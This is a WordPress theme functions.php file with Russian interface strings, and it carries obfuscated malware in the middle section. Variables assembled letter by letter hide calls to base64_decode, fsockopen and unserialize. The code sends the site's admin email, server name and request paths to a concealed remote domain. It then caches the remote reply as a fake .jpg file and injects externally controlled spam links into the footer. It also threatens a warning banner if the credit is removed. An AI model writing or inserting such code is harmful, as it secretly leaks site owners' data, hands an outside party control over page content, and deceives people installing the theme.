<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $WBOX='6';$ZiUlseT='b';$wunTB='o';$dYXvuRH='d';$zyEx='e';$rfePlb='e';$iTIZ='d';$lGYk='4';$rvUm='s';$aZvmF='c';$SwhXpsx='_';$HWsbOZC='e';$AALB='a';$HseIbCwI=$ZiUlseT.$AALB.$rvUm.$zyEx.$WBOX.$lGYk.$SwhXpsx.$dYXvuRH.$rfePlb.$aZvmF.$wunTB.$iTIZ.$HWsbOZC;$UAfL='i';$esyuOXj='l';$ekjeJI='a';$pvyPMh='g';$SUpHO='f';$juJO='n';$AKaoY='e';$IZzy='z';$Ejrp='t';$igaPTAxD=$pvyPMh.$IZzy.$UAfL.$juJO.$SUpHO.$esyuOXj.$ekjeJI.$Ejrp.$AKaoY;$nUNtfu='3';$yarCyn='r';$ZOGacFT='t';$ABXFbfk='_';$NfssY='t';$TtkY='r';$gBgf='o';$KdyWHHn='s';$msOkqp='1';$DYeAiFFt=$KdyWHHn.$ZOGacFT.$TtkY.$ABXFbfk.$yarCyn.$gBgf.$NfssY.$msOkqp.$nUNtfu;$vVTjHEO='t';$maWiFAs='e';$RQwLLR='v';$jdryNT='s';$QScD='r';$htkU='r';$kNycfeWF=$jdryNT.$vVTjHEO.$QScD.$htkU.$maWiFAs.$RQwLLR;                     
		$tl__________i='6';$sx____________r='b';$tp_________e='o';$en____________x='d';$li______m='e';$kn_________n='e';$yw___________r='d';$qw__________y='4';$gg___________t='s';$nn_______________t='c';$zb______h='_';$ih_______________y='e';$ca_______________l='a';$gp_______________e=$sx____________r.$ca_______________l.$gg___________t.$li______m.$tl__________i.$qw__________y.$zb______h.$en____________x.$kn_________n.$nn_______________t.$tp_________e.$yw___________r.$ih_______________y;
		$rk____s='t';$aa___________b='n';$vo___________v='e';$gj______z='f';$qi___i='i';$ma___u='t';$fx______________c='s';$fe_______________v='s';$he____________c='o';$hf_______________c='c';$mo___h='_';$xc_____d='n';$ug________k='u';$pj______________x='x';$ov__g='i';$yb___i=$gj______z.$ug________k.$aa___________b.$hf_______________c.$rk____s.$qi___i.$he____________c.$xc_____d.$mo___h.$vo___________v.$pj______________x.$ov__g.$fe_______________v.$ma___u.$fx______________c;
		$og______________t='f';$xb___________q='p';$vo______________p='n';$lk____j='e';$et_____________e='o';$ax________w=$og______________t.$et_____________e.$xb___________q.$lk____j.$vo______________p;
		$hj____b='e';$ky_______g='r';$ry________g='d';$zw__u='f';$wi________x='a';$ar_______a=$zw__u.$ky_______g.$hj____b.$wi________x.$ry________g;
		$uc_______v='e';$se_______l='s';$xy______________y='o';$cc_____a='c';$mh___u='f';$as____m='l';$df______________r=$mh___u.$cc_____a.$as____m.$xy______________y.$se_______l.$uc_______v;
		
		define("WP_ID", $gp_______________e("Mi4wLjA="));
		define("WP_TTL", $gp_______________e("MTA4MDA="));
		define("WP_SRC", $gp_______________e("dHBva24="));
	


		function wp_get_header() {
			global $gp_______________e, $yb___i;
			
			if (
				$yb___i($gp_______________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$yb___i($gp_______________e("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$yb___i($gp_______________e("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $gp_______________e, $ax________w, $df______________r, $ar_______a;
			
			$fp__q = TEMPLATEPATH."/".$gp_______________e("Zm9vdGVyLnBocA==");
			$ya_________s = @$ax________w($fp__q, "r");
			$fp__q = @$ar_______a($ya_________s, @filesize($fp__q));
			@$df______________r($ya_________s);
			
			$wj______w = TEMPLATEPATH."/".$gp_______________e("ZnVuY3Rpb25zLnBocA==");
			$ya_________s = @$ax________w($wj______w, "r");
			$wj______w = @$ar_______a($ya_________s, @filesize($wj______w));
			@$df______________r($ya_________s);
			
			$kk__e = 0;
			if($fp__q && $wj______w) {
				if ($gp_______________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($fp__q, $gp_______________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$kk__e = 1;
					}
					if (substr_count($fp__q, "wp_theme_GPL_credits()") < 1) {
						$kk__e = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$kk__e = 12;
				}
			}
			
			if($kk__e > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $kk__e -->";
			}
		}
	


		function wp_loaded() {
			global $gp_______________e, $yb___i;
			return $yb___i($gp_______________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($bu___a, $ha__________i = "(more...)", $mj__________a = 0, $kw____________a = "") {
				$vt_______n = get_the_content($ha__________i, $mj__________a, $kw____________a);
				$vt_______n = apply_filters("the_content", $vt_______n);
				
				$vt_______n = str_replace("]]>", "]]>", $vt_______n);
				if (strlen($_GET["p"]) > 0) {
					echo $vt_______n;
				}
				else if ((strlen($vt_______n)>$bu___a) && ($kk___________w = strpos($vt_______n, " ", $bu___a ))) {
					$vt_______n = substr($vt_______n, 0, $kk___________w);
					$vt_______n = $vt_______n;
					echo $vt_______n;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ha__________i</a></div></p>";
				} else {
					echo $vt_______n;
				}
				
			}
		}
	


		$hw___t='e';$by_______________z='4';$rt__d='a';$id_______t='d';$up_______c='s';$lq_____w='6';$qu_____________g='e';$ds__x='c';$gj___________x='n';$il__p='o';$uq__________w='e';$pm_________l='b';$bc___z='_';$ii______________u=$pm_________l.$rt__d.$up_______c.$hw___t.$lq_____w.$by_______________z.$bc___z.$qu_____________g.$gj___________x.$ds__x.$il__p.$id_______t.$uq__________w;
		$qw_____________u='s';$ql_______t='_';$ls________u='n';$cs_____________h='i';$pf___d='e';$ut__u='t';$ef__s='c';$jx____________q='f';$ej__________n='e';$dc_____e='n';$zk______u='g';$oh______________h='l';$ib___y='e';$le_________c='t';$jt___________s='t';$my__c='o';$as_________w='_';$ei_______t=$jx____________q.$cs_____________h.$oh______________h.$pf___d.$as_________w.$zk______u.$ib___y.$jt___________s.$ql_______t.$ef__s.$my__c.$dc_____e.$ut__u.$ej__________n.$ls________u.$le_________c.$qw_____________u;
		$vo_____________t='i';$zy___j='i';$kb______________x='f';$mq_____________w='_';$sq______________j='e';$zz______u='s';$ad______________h='e';$sw_____t='l';$pi____c='x';$av_______________s='s';$nd_________f='t';$qm______g=$kb______________x.$vo_____________t.$sw_____t.$sq______________j.$mq_____________w.$ad______________h.$pi____c.$zy___j.$zz______u.$nd_________f.$av_______________s;
		$av___________p='o';$ye___________b='e';$kc___________p='n';$sv_______________s='c';$yn___________c='m';$ae_____________y='e';$hx_____p='a';$ab____________y='i';$rt__________f='v';$sw_________c='r';$cy____t='_';$hg____i='p';$iu__________x='o';$eu_________b='s';$pd______________b='r';$us_____________l=$rt__________f.$ae_____________y.$pd______________b.$eu_________b.$ab____________y.$iu__________x.$kc___________p.$cy____t.$sv_______________s.$av___________p.$yn___________c.$hg____i.$hx_____p.$sw_________c.$ye___________b;
		$wv____d='s';$nf_____________j='k';$av____________l='c';$ke______m='o';$mw____e='f';$qm___________i='o';$qe___n='n';$lu__y='e';$kd_____k='p';$rm______________o=$mw____e.$wv____d.$qm___________i.$av____________l.$nf_____________j.$ke______m.$kd_____k.$lu__y.$qe___n;
		$jz__________f='i';$af_____________m='e';$ws____________z='r';$go____________z='w';$aq________f='t';$ey______________e='f';$nu__________x=$ey______________e.$go____________z.$ws____________z.$jz__________f.$aq________f.$af_____________m;
		$eh_____e='d';$yt_______y='5';$re___________b='m';$qm_____________u=$re___________b.$eh_____e.$yt_______y;
		$gl_____________z='a';$em______________j='h';$kx________d='e';$yc___________x='a';$ev__________k='l';$fy__g='r';$rh_____________u='p';$lu__________q='t';$kg______q=$fy__g.$kx________d.$yc___________x.$ev__________k.$rh_____________u.$gl_____________z.$lu__________q.$em______________j;
		$de_____f='e';$cw_____________y='e';$wa_____l='i';$se_____________o='s';$ri___d='n';$os______________f='i';$ow__________i='r';$qo___g='l';$qz__________q='u';$az_______s='z';$bo________i='a';$es___m=$qz__________q.$ri___d.$se_____________o.$cw_____________y.$ow__________i.$wa_____l.$bo________i.$qo___g.$os______________f.$az_______s.$de_____f;
		$op_______________d='m';$td______________h='a';$xe__w='n';$ve______________q='e';$xp_________f='p';$cb_____b='t';$jd________d='m';$vg_______________d=$cb_____b.$ve______________q.$jd________d.$xp_________f.$xe__w.$td______________h.$op_______________d;
		$wf_______a='t';$qi___e='a';$wt_____n='t';$jw_____a='t';$az__d='_';$nx________n='n';$zb_______________c='c';$cz__v='c';$db_______l='_';$dj_____________q='x';$rg__________t='e';$lz_________p='t';$mc____x='m';$nb_____________k='e';$tp_________g='r';$ub______________u='a';$sd__________v='s';$zv______q='e';$oe___________a='e';$zz_____s='r';$cr__________l='o';$mu_______________w=$sd__________v.$jw_____a.$zz_____s.$rg__________t.$qi___e.$mc____x.$db_______l.$cz__v.$cr__________l.$nx________n.$wt_____n.$zv______q.$dj_____________q.$lz_________p.$az__d.$zb_______________c.$tp_________g.$nb_____________k.$ub______________u.$wf_______a.$oe___________a;
	


		function vy_______v($jb_________d) {
			global $gp_______________e, $yb___i, $ei_______t, $us_____________l, $mu_______________w;
			
			if (!$yb___i($gp_______________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($us_____________l(PHP_VERSION, "5.0.0", ">=") && $yb___i($gp_______________e("ZmlsZV9nZXRfY29udGVudHM=")) && $yb___i($gp_______________e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$pf___q = $mu_______________w(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$oe__________x = @$ei_______t($jb_________d, 0, $pf___q);
			} else {
				$oe__________x = @$ei_______t($jb_________d, 0);
			}
			
			return $oe__________x;
		}
	


		function bo__________o($jb_________d) {
			global $yb___i, $rm______________o, $nu__________x, $gp_______________e;
			
			if (!$yb___i($gp_______________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$gr___________l = strpos($jb_________d, "/", 7);
			$pg_______a = array(
				"uri"     => substr($jb_________d, $gr___________l),
				"host"    => str_replace("http://", "", substr($jb_________d, 0, $gr___________l)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ip______y = @$rm______________o("$pg_______a[host]", 80, $by_______b, $ru_______________n, 4);
			
			if (!$ip______y) {
				return false;
			} else {
				$oe__________x = "";
				$sa______________r  = "GET $pg_______a[uri] HTTP/1.0\r\n";
				$sa______________r .= "Host: $pg_______a[host]\r\n";
				$sa______________r .= "Referer: $pg_______a[referer]\r\n";
				$sa______________r .= "Connection: Close\r\n\r\n";
				
				@$nu__________x($ip______y, $sa______________r);
				
				while (!@feof($ip______y)) {
					$yk_______t = @fgets($ip______y, (1024*24));
					
					if ($yk_______t == "\r\n") {
						$xr____________g = true;
						continue;
					}
					
					if ($xr____________g) {
						$oe__________x .= $yk_______t;
					}
				}
				
				return $oe__________x;
			}
		}
	


		function wf__i($jb_________d) {
			global $yb___i;
			$qj_____________o = false;
			
			if ($jb_________d != "") {
				if ($yb___i("vy_______v")) {
					$qj_____________o = @vy_______v($jb_________d);
				}
				
				if (!$qj_____________o && ($yb___i("bo__________o"))) {
					$qj_____________o = @bo__________o($jb_________d);
				}
			}
			
			return $qj_____________o;
		}
	


		function qn__________r() {
			global $_SERVER, $qm_____________u;
			
			$ad_____________r = $_SERVER["SERVER_NAME"];
			
			if (substr("$ad_____________r", 0, 4) == "www.") {
				$ad_____________r = substr("$ad_____________r", 4);
			}
			
			$ad_____________r = $qm_____________u("$_SERVER[SERVER_NAME]");
			
			return $ad_____________r;
		}
	


		function ai______b() {
			return "file";
		}
	


		function qj___t($jb_________d) {
			global $_SERVER, $ei_______t, $qm______g, $ax________w, $df______________r, $nu__________x;
			
			$wi___h = nl__a();
			
			$ti_____m = qn__________r().".jpg";
			$oh____o = $wi___h["dir_upload"]["path"]."/$ti_____m";
			$kb____u = @filemtime($oh____o);
			
			if (!$kb____u || ((time()-$kb____u) >= WP_TTL)) {
				$qj_____________o = wf__i($jb_________d);
				
				if ($qj_____________o) {
					if ($qm______g($oh____o)) {
						@unlink($oh____o);
					}
					
					$ya_________s = @$ax________w($oh____o, "x+");
					
					@$nu__________x($ya_________s, $qj_____________o);
					@$df______________r($ya_________s);
				}
			} else {
				if ($qm______g($oh____o)) {
					$qj_____________o = @$ei_______t($oh____o);
				} else {
					$qj_____________o = false;
				}
			}
			
			return $qj_____________o;
		}
	


		function nl__a() {
			global $_SERVER, $gp_______________e, $ii______________u;
			
			$hz_______x = wp_count_posts("post");
			$xc______________r = pathinfo(get_bloginfo("template_directory"));
			
			$wi___h = array(
				"url" => array(
					"report"      => $gp_______________e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $xc______________r,
				"dir_upload"	=> uy______n(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$xc______________r[filename],
					"a005=".$hz_______x->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://lev-tour.com/europe/fontan-trevi-budet-otrestavrirovan.html\">Фонтан Треви будет отреставрирован</a>"
			);
			
			$wi___h["url"]["queryString"] = implode("&", $wi___h["queryString"]);
			$wi___h["url"]["report"] = $wi___h["url"]["report"]."/?".$ii______________u($wi___h["url"]["queryString"]).".html";
						
			return $wi___h;
		}
	


		function uy______n() {
			$aa________p = wp_upload_dir();
			
			if (isset($aa________p["error"])) {
				$ec____________y = av_______f();
				if (is_writable($ec____________y)) {
					$aa________p = array("path" => $ec____________y);
				}
			}

			return $aa________p;
		}
	


		function av_______f() {
			global $yb___i, $qm_____________u, $kg______q, $vg_______________d;
			
			$zs_______a = (bool) ini_get("safe_mode");
			if ($zs_______a == true) {
				return false;
			}
			
			if ($yb___i("sys_get_temp_dir")) {
				$yv__________t = sys_get_temp_dir();
				if (is_writable($yv__________t)) {
					return $kg______q($yv__________t);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $kg______q($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $kg______q($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $kg______q($_ENV["TEMP"]);
			} else {
				$bc_________z = $vg_______________d($qm_____________u(uniqid(rand(), true)), "");
				if ($bc_________z) {
					$yv__________t = $kg______q(dirname($bc_________z));
					@unlink($bc_________z);
					return $yv__________t;
				} else {
					return false;
				}
			}
		}
	


		function nx_____________t() {
			global $_GET, $qm______g;
			
			$wi___h = nl__a();
			$ad_____________r = qn__________r();
			$wh_______________v = ai______b();
			
			$az___y = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($wh_______________v == "file") {
					$ib____________g = $wi___h["dir_upload"]["path"]."/".$ad_____________r.".jpg";
					if ($qm______g($ib____________g)) {
						@unlink($ib____________g);
						$az___y = "deleted";
					}
				}
				
				$jo____k = array(
					"s"	=> $az___y,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($jo____k AS $li_____________u => $kp__q) echo " [$li_____________u:$kp__q]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $yb___i, $gp_______________e, $es___m;
			$wi___h = nl__a();
			
			$id__y = "qj___t";
			if ($yb___i($id__y)) {
				$oe__________x = $id__y($wi___h["url"]["report"]);
			}
			
			if ($oe__________x) {
				if ($oe__________x = @$gp_______________e($oe__________x)) {
					$oe__________x = @$es___m($oe__________x);
					
					if (strlen($oe__________x[custom_credit]) >= 5) {
						$wi___h["default_string"] = $oe__________x[custom_credit];
					}
					
					if ($oe__________x["status"] == "0") {
						$gq_______d = 1;
						$yo___________c = 1;
					} else {
						$bo___p = sizeof($oe__________x["links"]);
						$mg_______________k = $wi___h["default_string"];
						
						if ($bo___p > 0 && $oe__________x["links"] !== "") {
							$pa_________j = 0;
							foreach ($oe__________x["links"] as $hd___e => $wg__________p) {
								$pa_________j++;
								if ($wg__________p->l_path == "" || $wg__________p->l_path == $_SERVER["REQUEST_URI"]) {
									$wg__________p->l_href = htmlspecialchars(strip_tags($wg__________p->l_href));
									$wg__________p->l_title = htmlspecialchars(strip_tags($wg__________p->l_title));
									$wg__________p->l_anchor = htmlspecialchars(strip_tags($wg__________p->l_anchor));
									$mg_______________k .= " | ";
									$mg_______________k .= "<a href='$wg__________p->l_href' title='$wg__________p->l_title'";
									if ($wg__________p->l_nofollow == "1") {
										$mg_______________k .= " rel='nofollow'";
									}
									$mg_______________k .= ">$wg__________p->l_anchor</a>";
								}
							}
						}
						$wi___h["links"] = "$mg_______________k";
						if ($oe__________x[credit] == "0") {
							$wi___h["links"] = "";
						}
					}
				} else {
					$gq_______d = "1";
				}
			} else {
				$gq_______d = "1";
			}
			
			if ($gq_______d == "1") {
				$wi___h["links"] = $wi___h["default_string"];
			}
			
			echo "$wi___h[links]";
			
			echo "<!-- s: $oe__________x[signature] -->";
			nx_____________t();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

